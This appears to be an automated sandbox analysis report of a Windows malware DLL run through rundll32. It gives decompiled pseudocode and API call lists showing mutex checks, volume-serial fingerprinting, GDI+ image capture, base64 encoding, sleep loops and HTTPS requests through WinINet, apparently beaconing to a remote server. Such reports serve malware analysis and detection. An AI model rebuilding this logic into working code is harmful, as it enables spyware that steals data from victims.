lstrlenA.KERNEL32(771CC486,?,?,?,00000000,00000000,00000000,00000000,771CC486,00000000,?,?,?,10005C39,00000000,00000000), ref: 100053A2
wsprintfA.USER32 ref: 100053B8

Part of subcall function 10004CB8: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10004CE1
Part of subcall function 10004CB8: InternetConnectA.WININET(00000000,00000000,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 10004CF7
Part of subcall function 10004CB8: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00800000,00000000), ref: 10004D10
Part of subcall function 10004CB8: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,771CC486,00000000), ref: 10004D25
Part of subcall function 10004CB8: HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 10004D32
Part of subcall function 10004CB8: HttpQueryInfoA.WININET(00000000,20000013,00000000,?), ref: 10004D57
Part of subcall function 10004CB8: InternetReadFile.WININET(00000000,00000000,00010000,?), ref: 10004D93

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003FDF, Relevance: 3.1, APIs: 2, Instructions: 77

C-Code - Quality: 51%

			E10003FDF(intOrPtr _a4, void* _a8) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int _t26;
				intOrPtr _t28;
				signed int _t30;
				intOrPtr _t32;
				signed int _t35;
				signed int _t44;
				intOrPtr _t47;
				signed int _t51;

				_t35 = 0;
				_push( &_v12);
				_v8 = 0;
				_push( &_v8);
				_v12 = 0;
				L10006C50();
				_t26 = _v12;
				if(_t26 != 0) {
					_t44 = 0x4c;
					_push( ~(0 | __eflags > 0x00000000) | _t26 * _t44); // executed
					_t28 = E10003F01(); // executed
					_t47 = _t28;
					_v20 = _t47;
					__eflags = _t47;
					if(_t47 != 0) {
						_push(_t47);
						_push(_v12);
						_push(_v8);
						L10006C56();
						_t51 = 0;
						__eflags = _v8;
						if(_v8 <= 0) {
							L10:
							E10003F0A(_t47);
							_t30 = _t35;
							L11:
							return _t30;
						}
						_t16 = _t47 + 0x30; // 0x30
						_t31 = _t16;
						_v16 = _t16;
						while(1) {
							_t32 = E100031C9(_t31,  *_t31, _a4);
							__eflags = _t32;
							if(_t32 == 0) {
								break;
							}
							_t51 = _t51 + 1;
							_t31 = _v16 + 0x4c;
							_v16 = _v16 + 0x4c;
							__eflags = _t51 - _v8;
							if(_t51 < _v8) {
								continue;
							}
							goto L10;
						}
						_t35 = 1;
						__eflags = _t51 * 0x4c + _t47;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t47 = _v20;
						goto L10;
					}
					_t30 = 0;
					goto L11;
				}
				return 0;
			}

0x10003fe9
0x10003feb
0x10003fef
0x10003ff2
0x10003ff3
0x10003ff6
0x10003ffb
0x10004000
0x1000400b
0x10004015
0x10004016
0x1000401b
0x1000401d
0x10004021
0x10004023
0x1000402a
0x1000402b
0x1000402e
0x10004031
0x10004036
0x10004038
0x1000403b
0x10004075
0x10004076
0x1000407c
0x1000407f
0x00000000
0x1000407f
0x1000403d
0x1000403d
0x10004040
0x10004043
0x10004048
0x1000404f
0x10004051
0x00000000
0x00000000
0x10004056
0x10004057
0x1000405a
0x1000405d
0x10004060
0x00000000
0x00000000
0x00000000
0x10004062
0x10004067
0x10004069
0x1000406e
0x1000406f
0x10004070
0x10004071
0x10004072
0x00000000
0x10004072
0x10004025
0x00000000
0x10004025
0x00000000

APIs

GdipGetImageEncodersSize.GDIPLUS(00000000,0000000A,00000001,100074FC,00000005,0000000A,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 10003FF6
GdipGetImageEncoders.GDIPLUS(00000000,0000000A,00000000,00000000,00000000,00000000,0000000A,00000001,100074FC,00000005,0000000A,00000000), ref: 10004031

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003DBF, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51

C-Code - Quality: 78%

			E10003DBF(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _t12;
				void* _t13;
				void* _t15;
				void* _t16;
				void* _t20;
				signed int _t32;
				intOrPtr _t35;
				void* _t38;
				void* _t39;

				_push(__ecx);
				_v8 = __ecx;
				_t12 = E10003DA5(__eflags, 1, _a8); // executed
				_t35 = _a4;
				_t32 = _t12;
				_t4 = _t35 + 1; // 0x7
				_push(_t4 * _t32 + 1);
				_t13 = E10003F01();
				_a8 = _a8 & 0x00000000;
				_t39 = _t38 + 0xc;
				_t20 = _t13;
				_t41 = _t32;
				if(_t32 != 0) {
					do {
						_t15 = E10003DA5(_t41, 1, _t35); // executed
						_t16 = E10003E38(_v8, _t15); // executed
						_a8 = _a8 + wsprintfA(_a8 + _t20, "%s/", _t16);
						E10003F0A(_t16);
						_t35 = _a4;
						_t39 = _t39 + 0x10;
						_t32 = _t32 - 1;
					} while (_t32 != 0);
				}
				return _t20;
			}

0x10003dc2
0x10003dc9
0x10003dce
0x10003dd3
0x10003dd6
0x10003dd8
0x10003ddf
0x10003de0
0x10003de5
0x10003de9
0x10003dec
0x10003dee
0x10003df0
0x10003df2
0x10003df5
0x10003e00
0x10003e19
0x10003e1d
0x10003e22
0x10003e25
0x10003e28
0x10003e28
0x10003df2
0x10003e35

APIs

wsprintfA.USER32 ref: 10003E13

Strings

%s/, xrefs: 10003E0D

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10002CFD, Relevance: 3.0, APIs: 2, Instructions: 35

C-Code - Quality: 100%

			E10002CFD(void* __ecx, void** _a4) {
				void* _t3;
				long _t9;
				void* _t14;

				_t15 = E10002F3F(__ecx, 0x1000719c, 0x1b);
				_t3 = CreateMutexA(0, 1, _t2); // executed
				_t14 = _t3;
				_t9 = GetLastError();
				E10003F0A(_t15);
				if(_t14 == 0 || _t9 == 0xb7) {
					return 1;
				} else {
					 *_a4 = _t14;
					return 0;
				}
			}

0x10002d11
0x10002d18
0x10002d1e
0x10002d27
0x10002d29
0x10002d31
0x00000000
0x10002d3b
0x10002d3e
0x00000000
0x10002d40

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,00000000,?,?,10002CB3,?), ref: 10002D18
GetLastError.KERNEL32(?,00000000,?,?,10002CB3,?), ref: 10002D20

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003F41, Relevance: 3.0, APIs: 2, Instructions: 23

C-Code - Quality: 58%

			E10003F41(intOrPtr* __ecx, signed int _a4) {
				void* _t7;
				intOrPtr* _t13;

				_t13 = __ecx;
				_push( *((intOrPtr*)(__ecx + 4)));
				 *__ecx = 0x10007350; // executed
				L10006C3E(); // executed
				if((_a4 & 0x00000001) != 0) {
					if((_a4 & 0x00000004) != 0) {
						_push(0x10);
						_push(__ecx);
						E10002191(_t7);
					} else {
						_push(__ecx);
						L10006C26();
					}
				}
				return _t13;
			}

0x10003f45
0x10003f47
0x10003f4a
0x10003f50
0x10003f59
0x10003f5f
0x10003f69
0x10003f6b
0x10003f6c
0x10003f61
0x10003f61
0x10003f62
0x10003f62
0x10003f5f
0x10003f77

APIs

GdipDisposeImage.GDIPLUS(?), ref: 10003F50
GdipFree.GDIPLUS(?,?), ref: 10003F62

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10004126, Relevance: 3.0, APIs: 2, Instructions: 18

C-Code - Quality: 16%

			E10004126(void* __ecx) {
				signed int _v8;
				void* _t10;

				_t10 = __ecx;
				_v8 = _v8 & 0x00000000;
				__imp__IsWow64Process(GetCurrentProcess(),  &_v8); // executed
				_push(0x40);
				_t9 =  !=  ? _t10 : 0x20;
				return  !=  ? _t10 : 0x20;
			}

0x10004126
0x1000412a
0x10004139
0x10004145
0x1000414b
0x10004151

APIs

GetCurrentProcess.KERNEL32(00000000,?,?,10004961,00002710,771CC486), ref: 10004132
IsWow64Process.KERNELBASE(00000000,?,?,10004961,00002710,771CC486), ref: 10004139

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100027C7, Relevance: 3.0, APIs: 2, Instructions: 9

C-Code - Quality: 100%

			E100027C7(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
				return _t3;
			}

0x100027d6
0x100027dd

APIs

GetProcessHeap.KERNEL32(00000008,00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027CF
RtlAllocateHeap.NTDLL(00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027D6

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003EC9, Relevance: 3.0, APIs: 2, Instructions: 9

C-Code - Quality: 100%

			E10003EC9(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
				return _t3;
			}

0x10003ed8
0x10003edf

APIs

GetProcessHeap.KERNEL32(?,10002F51,?,00000000,?,?,?,10002D0F,1000719C,0000001B,?,00000000,?,?,10002CB3,?), ref: 10003ECC
RtlAllocateHeap.NTDLL(00000000,00000008,?,?,10002F51,?,00000000,?,?,?,10002D0F,1000719C,0000001B,?,00000000), ref: 10003ED8

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000291A, Relevance: 2.5, APIs: 2, Instructions: 24

C-Code - Quality: 100%

			E1000291A(void* _a4, long _a8) {
				void* _t5;
				void* _t6;
				void* _t8;

				_t5 = _a4;
				if(_t5 == 0) {
					_t6 = E100027C7(_a8);
					goto L5;
				} else {
					if(_a8 != 0) {
						_t8 = HeapReAlloc(GetProcessHeap(), 8, _t5, _a8); // executed
						return _t8;
					} else {
						E100028FC(_t5);
						_t6 = 0;
						L5:
						return _t6;
					}
				}
			}

0x1000291d
0x10002922
0x1000294c
0x00000000
0x10002924
0x10002928
0x10002941
0x10002948
0x1000292a
0x1000292b
0x10002930
0x10002951
0x10002953
0x10002953
0x10002928

APIs

GetProcessHeap.KERNEL32(00000008,00008000,00000000,?,1000278D), ref: 1000293A
HeapReAlloc.KERNEL32(00000000,?,1000278D), ref: 10002941

Part of subcall function 100028FC: GetProcessHeap.KERNEL32(00000008,00008000,?,10002930,00008000,?,1000278D), ref: 1000290B
Part of subcall function 100028FC: HeapFree.KERNEL32(00000000,?,10002930), ref: 10002912

Part of subcall function 100027C7: GetProcessHeap.KERNEL32(00000008,00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027CF
Part of subcall function 100027C7: RtlAllocateHeap.NTDLL(00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027D6

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003EE0, Relevance: 2.5, APIs: 2, Instructions: 13

C-Code - Quality: 100%

			E10003EE0(void* _a4) {
				void* _t3;
				int _t4;

				_t3 = GetProcessHeap();
				if(_t3 != 0 && _a4 != 0) {
					_t4 = HeapFree(_t3, 0, _a4); // executed
					return _t4;
				}
				return _t3;
			}

0x10003ee3
0x10003eeb
0x10003ef9
0x00000000
0x10003ef9
0x10003f00

APIs

GetProcessHeap.KERNEL32(?,10002D2E,00000000,?,00000000,?,?,10002CB3,?), ref: 10003EE3
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10003EF9

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003F0F, Relevance: 1.5, APIs: 1, Instructions: 20
window

C-Code - Quality: 54%

			E10003F0F(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t9;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t9 =  &_v8;
				_push(_t9);
				_push(_a8);
				_push(_a4);
				 *__ecx = 0x10007350; // executed
				L10006C4A(); // executed
				 *((intOrPtr*)(__ecx + 8)) = _t9;
				 *(__ecx + 4) = _v8;
				return __ecx;
			}

0x10003f12
0x10003f13
0x10003f17
0x10003f1b
0x10003f1c
0x10003f21
0x10003f24
0x10003f2a
0x10003f2f
0x10003f35
0x10003f3e

APIs

GdipCreateBitmapFromHBITMAP.GDIPLUS(0000000A,00000005,00000000,00000000,00000000,?,10003FD9,0000000A,00000005,00000010,?,10004697,00000000,00000000,00000005,0000000A), ref: 10003F2A

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100045EC, Relevance: 1.5, APIs: 1, Instructions: 19

C-Code - Quality: 100%

			E100045EC(void* __ecx) {
				long _v8;

				_v8 = 0;
				GetVolumeInformationW(0, 0, 0,  &_v8, 0, 0, 0, 0); // executed
				return _v8;
			}

0x100045fd
0x10004600
0x1000460c

APIs

GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,10005424,00002710,771CC486,00000000,00000000), ref: 10004600

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003FBE, Relevance: 1.5, APIs: 1, Instructions: 15

C-Code - Quality: 79%

			E10003FBE(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* _t5;

				_push(0x10);
				L10006C20();
				if(__eax == 0) {
					return 0;
				} else {
					_t5 = E10003F0F(__eax, _a4, _a8); // executed
					return _t5;
				}
			}

0x10003fc1
0x10003fc3
0x10003fca
0x10003fde
0x10003fcc
0x10003fd4
0x10003fda
0x10003fda

APIs

GdipAlloc.GDIPLUS(00000010,?,10004697,00000000,00000000,00000005,0000000A,00000000,?,?,?,?,?,?,?,00000000), ref: 10003FC3

Part of subcall function 10003F0F: GdipCreateBitmapFromHBITMAP.GDIPLUS(0000000A,00000005,00000000,00000000,00000000,?,10003FD9,0000000A,00000005,00000010,?,10004697,00000000,00000000,00000005,0000000A), ref: 10003F2A

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10004E51, Relevance: 1.3, APIs: 1, Instructions: 91

C-Code - Quality: 68%

			E10004E51(intOrPtr* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				intOrPtr _t17;
				void* _t18;
				intOrPtr _t19;
				signed int _t20;
				void* _t21;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				intOrPtr _t36;
				void* _t44;
				intOrPtr* _t47;
				void* _t56;

				_t56 = __eflags;
				_push(0x401);
				_t47 = __ecx;
				_v20 = E10003F01();
				_t36 = E10002F3F(__ecx, 0x10007394, 0xa);
				_v24 = _t36;
				_t17 = E10003DBF( *__ecx, _t56, 6, 5); // executed
				_v16 = _t17;
				_t18 = E10003DA5(_t56, 1, 7); // executed
				_t19 = E10003E38( *_t47, _t18); // executed
				_v12 = _t19;
				_t20 = E10003DA5(_t56, 0, 7); // executed
				_t21 = E10003DA5(_t56, 1, 3); // executed
				_t22 = E10003E38( *_t47, _t21); // executed
				_push(0);
				_v8 = _t22;
				_t23 = E10002B95();
				_t44 = _t36;
				_push(_t23);
				_push(_t36); // executed
				_t24 = E10002F91(_t44, _t56); // executed
				_t25 = E10002F3F(0x100073f8 + _t20 * 0x1e, 0x100073f8 + _t20 * 0x1e, 0x1e);
				wsprintfA(_v20, E10002F3F(0x100073f8 + _t20 * 0x1e, 0x10007520, 0xe), _v16, _v12, _t25, _v8, _t24);
				E10003F0A(_t26);
				E10003F0A(_t25);
				E10003F0A(_t24);
				E10003F0A(_v8);
				E10003F0A(_v12);
				E10003F0A(_v16);
				E10003F0A(_v24);
				return _v20;
			}

0x10004e51
0x10004e5a
0x10004e5f
0x10004e6d
0x10004e7a
0x10004e7c
0x10004e83
0x10004e8c
0x10004e8f
0x10004e99
0x10004ea2
0x10004ea5
0x10004eb0
0x10004ebb
0x10004ec0
0x10004ec3
0x10004ec6
0x10004ecb
0x10004ecc
0x10004ecd
0x10004ece
0x10004ee1
0x10004f05
0x10004f0c
0x10004f12
0x10004f1b
0x10004f23
0x10004f2b
0x10004f33
0x10004f3b
0x10004f4c

APIs

Part of subcall function 10003DBF: wsprintfA.USER32 ref: 10003E13

wsprintfA.USER32 ref: 10004F05

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000586A, Relevance: 1.3, APIs: 1, Instructions: 57
string

C-Code - Quality: 44%

			E1000586A(void* __ebx, void* __ecx, void* __eflags) {
				void* _t50;
				CHAR* _t51;
				CHAR* _t53;
				CHAR* _t82;
				CHAR* _t83;
				void* _t84;
				void* _t86;
				signed int _t98;
				void* _t108;
				void* _t110;
				void* _t113;
				signed int _t115;

				_t84 = __ebx;
				_t113 = __ecx;
				E100054A4(__ecx);
				 *((char*)(__ecx + 0x20)) = 0;
				_t108 = E10002D8F( *((intOrPtr*)(_t113 + 4)), lstrlenA( *(__ecx + 4)));
				_t91 = _t113;
				_t50 = E10005A03(_t113, _t108); // executed
				if(_t50 == 0) {
					_t51 = E10005204(_t113);
					__eflags = _t51;
					if(_t51 == 0) {
						L23:
						E100047EE(_t113);
						_t53 = E10005A4B(_t113, __eflags, _t108);
						_push(_t108);
						__eflags = _t53;
						if(_t53 == 0) {
							E10003F0A();
							__eflags = 0;
							return 0;
						} else {
							 *((char*)(_t113 + 0x20)) = 1;
							goto L18;
						}
					} else {
						_t82 = E10005A03(_t113, _t108);
						_push(_t108);
						__eflags = _t82;
						if(__eflags != 0) {
							goto L18;
						} else {
							_t83 = E10005A4B(_t113, __eflags);
							__eflags = _t83;
							if(_t83 == 0) {
								goto L23;
							} else {
								 *((char*)(_t113 + 0x20)) = 1;
								goto L17;
							}
						}
					}
				} else {
					L17:
					_push(_t108);
					L18:
					E10003F0A();
					_pop(_t108);
					_t91 = _t113;
					_pop(_t113);
					_push(_t84);
					_push(_t113);
					_push(_t108);
					_t110 = _t91;
					_t115 = 0;
					_t86 = 1;
					if( *(_t110 + 0x10) <= 0) {
						L4:
						if( *(_t110 + 0x10) <= _t86) {
							E100054A4(_t110);
						} else {
							_push( *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xc)) + 4)));
							_push(E10002B95() + 1);
							_push( *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xc)) + 4)));
							goto L6;
						}
					} else {
						while(lstrcmpiA( *(_t110 + 8),  *( *((intOrPtr*)(_t110 + 0xc)) + _t115 * 4)) != 0) {
							_t115 = _t115 + 1;
							if(_t115 <  *(_t110 + 0x10)) {
								continue;
							} else {
								goto L4;
							}
							goto L16;
						}
						__eflags =  *(_t110 + 8);
						if( *(_t110 + 8) != 0) {
							E10003F0A( *(_t110 + 8));
							_t18 = _t110 + 8;
							 *_t18 =  *(_t110 + 8) & 0x00000000;
							__eflags =  *_t18;
						}
						_t98 =  *(_t110 + 0x10);
						__eflags = _t115 - _t98 - 1;
						if(_t115 != _t98 - 1) {
							_t27 = _t115 + 1; // 0x1
							_push( *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xc)) + _t27 % _t98 * 4)));
							_push(E10002B95() + 1);
							_t35 = _t115 + 1; // 0x1
							_push( *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xc)) + _t35 %  *(_t110 + 0x10) * 4)));
							L6:
							 *(_t110 + 8) = E10002954();
						} else {
							__eflags = _t98 - _t86;
							if(_t98 <= _t86) {
								E100054A4(_t110);
							} else {
								_push( *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xc)) + 4)));
								 *(_t110 + 8) = E10002954( *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xc)) + 4)), E10002B95() + 1);
							}
							_t86 = 0;
						}
					}
					L16:
					return _t86;
				}
			}

0x1000586a
0x1000586c
0x1000586e
0x10005876
0x1000588b
0x1000588d
0x10005890
0x10005897
0x100058ab
0x100058b0
0x100058b2
0x100058d2
0x100058d4
0x100058dc
0x100058e1
0x100058e2
0x100058e4
0x100058ec
0x100058f3
0x100058f6
0x100058e6
0x100058e6
0x00000000
0x100058e6
0x100058b4
0x100058b7
0x100058bc
0x100058bd
0x100058bf
0x00000000
0x100058c1
0x100058c3
0x100058c8
0x100058ca
0x00000000
0x100058cc
0x100058cc
0x00000000
0x100058cc
0x100058ca
0x100058bf
0x10005899
0x10005899
0x10005899
0x1000589a
0x1000589a
0x100058a0
0x100058a1
0x100058a3
0x100055c8
0x100055c9
0x100055ca
0x100055cb
0x100055cf
0x100055d1
0x100055d5
0x100055f0
0x100055f3
0x1000568b
0x100055f9
0x100055fc
0x10005605
0x10005609
0x00000000
0x10005609
0x100055d7
0x100055d7
0x100055ea
0x100055ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x100055ee
0x10005619
0x1000561d
0x10005622
0x10005627
0x10005627
0x10005627
0x1000562b
0x1000562c
0x10005632
0x10005634
0x10005667
0x1000566f
0x1000567a
0x1000567b
0x10005684
0x1000560c
0x10005614
0x10005636
0x10005636
0x10005638
0x1000565c
0x1000563a
0x1000563d
0x10005655
0x10005655
0x10005661
0x10005661
0x10005634
0x10005690
0x10005695
0x10005695

APIs

lstrlenA.KERNEL32(?,00002710,771CC486,10005B3D,?,00000000), ref: 1000587A

Part of subcall function 10002D8F: CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DAB
Part of subcall function 10002D8F: CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DC8

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10002CA0, Relevance: 1.3, APIs: 1, Instructions: 39

C-Code - Quality: 91%

			E10002CA0() {
				void* _v8;
				void* __ecx;
				void* _t5;
				void* _t8;
				void* _t13;
				void* _t21;

				_push(_t13);
				_t21 = 0;
				_v8 = 0;
				_t5 = E10002CFD(_t13,  &_v8); // executed
				if(_t5 == 0) {
					if(E10003EC9(0x23) != 0) {
						_t21 = E1000471D(_t6);
					}
					E10005AFE(); // executed
					if(_t21 != 0) {
						E10004765();
						E10003EE0(_t21);
					}
					CloseHandle(_v8);
					_t8 = 0;
				} else {
					_t8 = 1;
				}
				return _t8;
			}

0x10002ca3
0x10002ca8
0x10002cab
0x10002cae
0x10002cb6
0x10002cc7
0x10002cd0
0x10002cd0
0x10002cd4
0x10002cdb
0x10002cdf
0x10002ce5
0x10002cea
0x10002cee
0x10002cf4
0x10002cb8
0x10002cba
0x10002cba
0x10002cfa

APIs

Part of subcall function 10002CFD: CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,00000000,?,?,10002CB3,?), ref: 10002D18
Part of subcall function 10002CFD: GetLastError.KERNEL32(?,00000000,?,?,10002CB3,?), ref: 10002D20

Part of subcall function 10003EC9: GetProcessHeap.KERNEL32(?,10002F51,?,00000000,?,?,?,10002D0F,1000719C,0000001B,?,00000000,?,?,10002CB3,?), ref: 10003ECC
Part of subcall function 10003EC9: RtlAllocateHeap.NTDLL(00000000,00000008,?,?,10002F51,?,00000000,?,?,?,10002D0F,1000719C,0000001B,?,00000000), ref: 10003ED8

Part of subcall function 10005AFE: Sleep.KERNEL32(00002710,?,00000000), ref: 10005B1F
Part of subcall function 10005AFE: Sleep.KERNEL32(00002710,?,00000000), ref: 10005B34
Part of subcall function 10005AFE: Sleep.KERNELBASE(001B7740,00000000,?,00000000), ref: 10005B6A
Part of subcall function 10005AFE: Sleep.KERNELBASE(00002710,00000000,?,00000000), ref: 10005B71
Part of subcall function 10005AFE: Sleep.KERNEL32(00002710,00000000,?,00000000), ref: 10005BA4
Part of subcall function 10005AFE: Sleep.KERNEL32(00002710,?,00000000), ref: 10005BB6
Part of subcall function 10005AFE: Sleep.KERNEL32(001B7740,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005C45
Part of subcall function 10005AFE: Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005C4C
Part of subcall function 10005AFE: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005E04
Part of subcall function 10005AFE: lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 10005E15
Part of subcall function 10005AFE: lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 10005E73
Part of subcall function 10005AFE: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 10005E86

CloseHandle.KERNEL32(?), ref: 10002CEE

Part of subcall function 10003EE0: GetProcessHeap.KERNEL32(?,10002D2E,00000000,?,00000000,?,?,10002CB3,?), ref: 10003EE3
Part of subcall function 10003EE0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10003EF9

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
